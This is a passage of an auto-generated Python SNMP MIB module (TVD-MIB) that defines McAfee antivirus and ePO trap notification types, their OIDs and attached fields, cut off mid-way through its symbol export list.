("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_SERVICE_MAX_LOAD = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1512)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1513)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_QUARANTINED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1514)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_NEW_MIB = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1900)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_FAILE_INSTPRODUCT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2201)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_RETRYLIMIT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2202)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_DISKSPACE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2204)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_SPIPE_DISKSPACE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2208)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2216)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mibBuilder.exportSymbols("TVD-MIB", mcafee_MAILCCNAME=mcafee_MAILCCNAME, mcafee_DOMAIN=mcafee_DOMAIN, mcafee_EVENT_TEST_TRAP=mcafee_EVENT_TEST_TRAP, mcafee_EVENT_UPDATE_VERSION_OLDER=mcafee_EVENT_UPDATE_VERSION_OLDER, mcafee_EVENT_MAIL_UPPERDISKLIMIT=mcafee_EVENT_MAIL_UPPERDISKLIMIT, mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK=mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK, mcafee_EVENT_EPO_AGENT_DISKSPACE=mcafee_EVENT_EPO_AGENT_DISKSPACE, mcafee_EVENT_VIRFOUND=mcafee_EVENT_VIRFOUND, mcafee_EVENT_UPDATECANCELED=mcafee_EVENT_UPDATECANCELED, mcafee_EVENT_FILEEXCLUDING=mcafee_EVENT_FILEEXCLUDING, mcafee_EVENT_DELETED_HEURISTICS=mcafee_EVENT_DELETED_HEURISTICS, mcafee_EVENT_VIRUS_FOUND_IN_MEMORY=mcafee_EVENT_VIRUS_FOUND_IN_MEMORY, mcafee_ACCESSPROCESSNAME=mcafee_ACCESSPROCESSNAME, mcafee_EVENT_SCAN_ITEM_INVALID=mcafee_EVENT_SCAN_ITEM_INVALID, mcafee_CLIENTCOMPUTER=mcafee_CLIENTCOMPUTER, mcafee_OS=mcafee_OS, mcafee_MAILFROMNAME=mcafee_MAILFROMNAME, mcafee_EVENT_MAIL_SERVICE_MAX_LOAD=mcafee_EVENT_MAIL_SERVICE_MAX_LOAD, mcafee_ENGINEVERSION=mcafee_ENGINEVERSION, mcafee_NOTESSERVERNAME=mcafee_NOTESSERVERNAME, mcafee_MAILIDENTIFIERINFO=mcafee_MAILIDENTIFIERINFO, mcafee_TARGETIP=mcafee_TARGETIP, mcafee_EVENT_GEN_SYSTEM_ERROR=mcafee_EVENT_GEN_SYSTEM_ERROR, mcafee_EVENT_CLEANERROR_BOOTSECTOR=mcafee_EVENT_CLEANERROR_BOOTSECTOR, mcafee_EVENT_EPO_FAILE_INSTPRODUCT=mcafee_EVENT_EPO_FAILE_INSTPRODUCT, mcafee_EVENT_SCHED_START_TASK_ERROR=mcafee_EVENT_SCHED_START_TASK_ERROR, mcafee=mcafee, mcafee_NOTESDBNAME=mcafee_NOTESDBNAME, mcafee_EVENT_INFECTION_PASSWORD_PROTECTED=mcafee_EVENT_INFECTION_PASSWORD_PROTECTED, mcafee_EVENT_UPDATE_RUNNING=mcafee_EVENT_UPDATE_RUNNING, mcafee_EVENTNAME=mcafee_EVENTNAME, mcafee_EVENT_SCED_TASK_END_OK=mcafee_EVENT_SCED_TASK_END_OK, mcafee_EVENT_EPO_SPIPE_DISKSPACE=mcafee_EVENT_EPO_SPIPE_DISKSPACE, mcafee_EVENT_TASKERR_LOGFILE=mcafee_EVENT_TASKERR_LOGFILE, mcafeeStandardTrapField=mcafeeStandardTrapField, mcafee_EVENT_MAIL_SERVICE_START=mcafee_EVENT_MAIL_SERVICE_START, mcafee_EVENT_OPTIONSERROR=mcafee_EVENT_OPTIONSERROR, mcafee_EVENT_SCAN_REPORT_OS=mcafee_EVENT_SCAN_REPORT_OS, mcafee_EVENT_DIR_ACCESS_ERROR=mcafee_EVENT_DIR_ACCESS_ERROR, mcafee_EVENT_VIRUS_QUARANTINE_FAILURE=mcafee_EVENT_VIRUS_QUARANTINE_FAILURE, mcafee_EVENT_SCAN_CANCELED=mcafee_EVENT_SCAN_CANCELED, mcafee_EVENT_MACRO_VIRUS_DETECTED=mcafee_EVENT_MACRO_VIRUS_DETECTED, mcafee_EVENT_OAS_STOP=mcafee_EVENT_OAS_STOP, mcafee_TASKNAME=mcafee_TASKNAME, mcafee_EVENT_TASK_ERR_MEMALLOC=mcafee_EVENT_TASK_ERR_MEMALLOC, mcafee_EVENT_MAIL_SERVICE_ABEND=mcafee_EVENT_MAIL_SERVICE_ABEND, mcafee_TRAPID=mcafee_TRAPID, mcafee_EVENT_SCHED_TASK_SUCCESS=mcafee_EVENT_SCHED_TASK_SUCCESS, mcafee_GMTTIME=mcafee_GMTTIME, mcafee_EVENT_MAIL_VIRUSQUARANTINED=mcafee_EVENT_MAIL_VIRUSQUARANTINED, mcafee_EVENT_INFECTION_ACESSDENIED=mcafee_EVENT_INFECTION_ACESSDENIED, mcafee_EVENT_UPGRADE_CANCELED=mcafee_EVENT_UPGRADE_CANCELED, mcafee_TSCLIENTID=mcafee_TSCLIENTID, mcafee_EVENT_FILECLEANERROR=mcafee_EVENT_FILECLEANERROR, mcafee_EVENT_MAIL_VIRUS_DETECTED=mcafee_EVENT_MAIL_VIRUS_DETECTED, mcafee_ENGINESTATUS=mcafee_ENGINESTATUS, mcafee_EVENT_UPDATEOK=mcafee_EVENT_UPDATEOK, mcafee_EVENT_MEMALLOC_ERROR=mcafee_EVENT_MEMALLOC_ERROR, mcafee_EVENT_MACRO_VIRUS_DELETED=mcafee_EVENT_MACRO_VIRUS_DELETED, mcafee_EVENT_FILEDELETED=mcafee_EVENT_FILEDELETED, mcafee_EVENT_INTERNAL_APP_ERROR=mcafee_EVENT_INTERNAL_APP_ERROR, mcafee_EVENT_EXCLUDEERR=mcafee_EVENT_EXCLUDEERR, mcafeeTVDTrap=mcafeeTVDTrap, mcafee_EVENT_SERVICE_STARTED_1064=mcafee_EVENT_SERVICE_STARTED_1064, mcafee_EVENT_SCAN_PROC_ERR=mcafee_EVENT_SCAN_PROC_ERR, mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED=mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED, mcafee_EVENT_WRITE_PROTECT_ERR=mcafee_EVENT_WRITE_PROTECT_ERR, mcafee_EVENT_MEDIA_NOT_FOUND_ERR=mcafee_EVENT_MEDIA_NOT_FOUND_ERR, mcafee_EVENT_FILE_IO_ERRORS=mcafee_EVENT_FILE_IO_ERRORS, mcafee_EVENT_QUAR_ERROR_HEURISTICS=mcafee_EVENT_QUAR_ERROR_HEURISTICS, mcafee_NOTEID=mcafee_NOTEID, mcafee_EVENT_DELETE_ERR_HEURISTICS=mcafee_EVENT_DELETE_ERR_HEURISTICS, mcafee_EVENT_UPGRADE_FAILED=mcafee_EVENT_UPGRADE_FAILED, mcafee_SOURCEIP=mcafee_SOURCEIP, mcafee_EVENT_FILEDELETEERROR=mcafee_EVENT_FILEDELETEERROR, mcafee_EVENT_SCAN_CANCELED_BY_UPD=mcafee_EVENT_SCAN_CANCELED_BY_UPD, mcafee_MAILSUBJECTLINE=mcafee_MAILSUBJECTLINE, mcafee_NUMVIRS=mcafee_NUMVIRS, mcafee_EVENT_MAIL_VIRUS_QUARANTINED=mcafee_EVENT_MAIL_VIRUS_QUARANTINED, mcafee_EVENT_MAIL_VIRUS_FILTERED=mcafee_EVENT_MAIL_VIRUS_FILTERED, mcafee_EVENT_SCAN_TIMEOUT=mcafee_EVENT_SCAN_TIMEOUT, mcafee_EVENT_DISK_IO_ERR=mcafee_EVENT_DISK_IO_ERR, mcafee_EVENT_ODS_SCAN_STARTED=mcafee_EVENT_ODS_SCAN_STARTED, mcafee_EVENT_NEW_MIB=mcafee_EVENT_NEW_MIB, 